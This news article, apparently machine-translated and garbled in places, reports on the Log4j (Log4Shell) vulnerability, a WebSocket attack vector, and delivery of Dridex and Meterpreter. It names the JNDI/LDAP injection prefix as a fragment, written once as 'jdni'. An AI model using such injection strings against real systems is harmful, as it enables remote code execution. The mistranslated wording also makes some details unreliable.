Log4j deadly hole expands victims’ vulnerability

Watch out for the Log4j vulnerability! This nasty software bug is freaking out much of the IT world as it follows us into the New Year.

Undoubtedly, many organizations and SMEs without IT staff have no idea of ​​its existence. But ignoring Log4j only makes them more vulnerable to attack. They remain helpless.

Log4j is a very common section of code that helps software applications keep track of their past activities. Code writers are building on this recurring code rather than reinventing the software wheel by creating more logging or record-keeping programs to duplicate the same functions.

Earlier this month, cybersecurity experts discovered that by asking Log4j to log a line of malicious code, Log4j executes that code in the process. This allows bad actors to gain access to the control servers that are running Log4j.

This revelation put almost every major software company in crisis mode. They researched their products to see if the Log4j vulnerability affected them and if so, how could they fill the gap.

This vulnerability is a huge deal. Log4j has been around for almost a decade, noted Theresa Payton, former White House chief information officer and CEO of cybersecurity consulting firm Fortalice Solutions.

“Think of it as your library of everything that can be saved. We tell organizations [to] record everything [as] you may need it later for forensic medicine. Log4J is therefore often used by Java developers when they want to record that a person has logged in and can even use it to track access to applications, ”Payton told TechNewsWorld.

Many companies may not even know if they have used Log4j, making it even more difficult to know the extent of the problem. In order for them to find out, they would need a software engineer to browse the different systems to research usage and then look at the versions, she added.

“It can take a long time,” Payton noted, “and time is something you don’t have when you’re racing against time against bad actors looking to exploit these vulnerabilities.”

Backdoor for pirates

Think of a door lock used in a variety of security hardware installations in millions of places around the world. Some door locks have the same partial failure in a small pinion that allows almost any key to open the lock.

Changing your own lock is an easy fix if you are aware of the potential failure and have the tools to do the replacement job. To do this all over the world is an insurmountable task. This concept is what makes the Log4j debacle so threatening.

Log4j has been part of the Java programming language that has been used in writing software since the mid-1990s. The software running Log4j code drives business and consumer applications everywhere.

Cloud storage companies that provide the digital backbone for millions of other applications are also affected. Major vendors of software programs used in millions of devices are also involved.

Typically, when a security vulnerability is detected, the Information Security Officer (CISO) leads the load of updating and patching systems or implementing manual mitigation measures, a explained Payton. Log4j is more insidious and hidden and is not entirely under the control of the RSSI.

“Hunting and finding this vulnerability requires everyone who is a programmer. Where is development happening nowadays, everywhere! Developers can be internal staff, outsourced development, offshore development, and third-party vendors, ”she observed.

All of this represents an inexhaustible attack opportunity for hackers. Of course, not everyone will be hacked, at least not immediately. The big key question is whether your equipment is cluttered with the problematic code. Just finding out puts IT departments and software engineers in overload.

“The implications of exploiting this vulnerability are the subject of my nightmares. An unethical hacker with knowledge and access could use this vulnerability and target servers using this logging capability with remote code execution on the servers, ”Payton warned.

Expansion of attack vectors

Hackers are now fully aware of the Log4j vulnerability. Cyber ​​security hunters see many instances of bad guys expanding what they can do with their attacks.

The Blumira research team recently discovered an alternative attack vector in the Log4j vulnerability that relies on a basic JavaScript WebSocket connection to trigger the remote code execution (RCE) vulnerability locally via a drive-compromise. by. This discovery worsens the situation of vulnerability.

One of the first assumptions made by cybersecurity experts was that Log4j’s impact was limited to vulnerable exposed servers. This recently discovered attack vector means that anyone with a vulnerable version of Log4j can be exploited through the path of a listening server on their machine or local network by browsing a website and triggering the vulnerability.

WebSockets have been used in the past to analyze ports on internal systems, but this represents one of the first remote code execution exploits relayed by WebSockets, proposed Jake Williams, co-founder and CTO of the response company. BreachQuest incidents.

“That shouldn’t change anyone’s stance on vulnerability management, however. Organizations should strive to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option, ”he told TechNewsWorld.

While important, the attackers are likely to favor the remote exploit over the local exploit, added John Bambenek, senior threat hunter at Netenrich, an IT operations and digital security company. That being said, this news means that relying on the WAF or other network defenses is no longer effective mitigation.

“The fix remains the most important step an organization can take,” he told TechNewsWorld.

Log4Shell vulnerability

The Log4j vulnerability, dubbed Log4Shell, already provides a relatively easy exploitation path for threat actors, the Blumira report noted. It does not require authentication to take full control of the web servers.

Using this vulnerability, attackers can call external Java libraries via $ {jdni: ldap: // and $ {jndi: ldaps: // and drop shells to deploy the RCE attack without additional effort. This new attack vector extends Log4j’s attack surface even further and can impact services running even as a local host that have not been exposed to any network, according to Blumira.

“When the Log4j vulnerability was released, it quickly became apparent that it could potentially become a bigger issue. This attack vector opens up a variety of potential malicious use cases, ranging from malicious advertising to creating water holes for drive-by attacks, ”said Matthew Warner, CTO and co-founder of Blumira.

“Bringing this information to light ensures that organizations have the ability to act quickly and protect themselves against malicious threats,” he added.

Log4j linked to Dridex, Meterpreter

The offshoot of the Log4j Log4Shell vulnerability is another infection path that researchers recently discovered by installing the notorious Dridex or Meterpreter banking trojan on vulnerable devices, according to a report from Bleeping Computer.

The Dridex malware is a banking Trojan originally developed to steal online banking credentials. It has become a loader that downloads various mods to perform tasks like installing additional payloads, streaming to other devices, and taking screenshots.

Primarily used to run Windows commands, if Dridex lands on a non-Windows machine, it downloads and runs a Python for Linux / Unix script instead to install Meterpreter.

Meterpreter, a Metasploit attack payload, is deployed using an in-memory DLL injection that resides in memory and does not write anything to disk. It provides an interactive shell that an attacker uses to explore the target machine and execute code.

Jen Easterly, US director of the Cybersecurity and Infrastructure Security Agency, said in recent media presentations that the Log4j vulnerability is the most severe vulnerability she has seen in her decades of career. Cyber ​​security experts warn that the Log4j vulnerability is the biggest software flaw ever in terms of the number of services, sites and devices exposed.

About Jon Moses

Check Also

NSA, CISA say: don’t block PowerShell, here’s what to do instead

Image: Getty Images/iStockphoto Cybersecurity authorities in the United States, United Kingdom, and New Zealand have …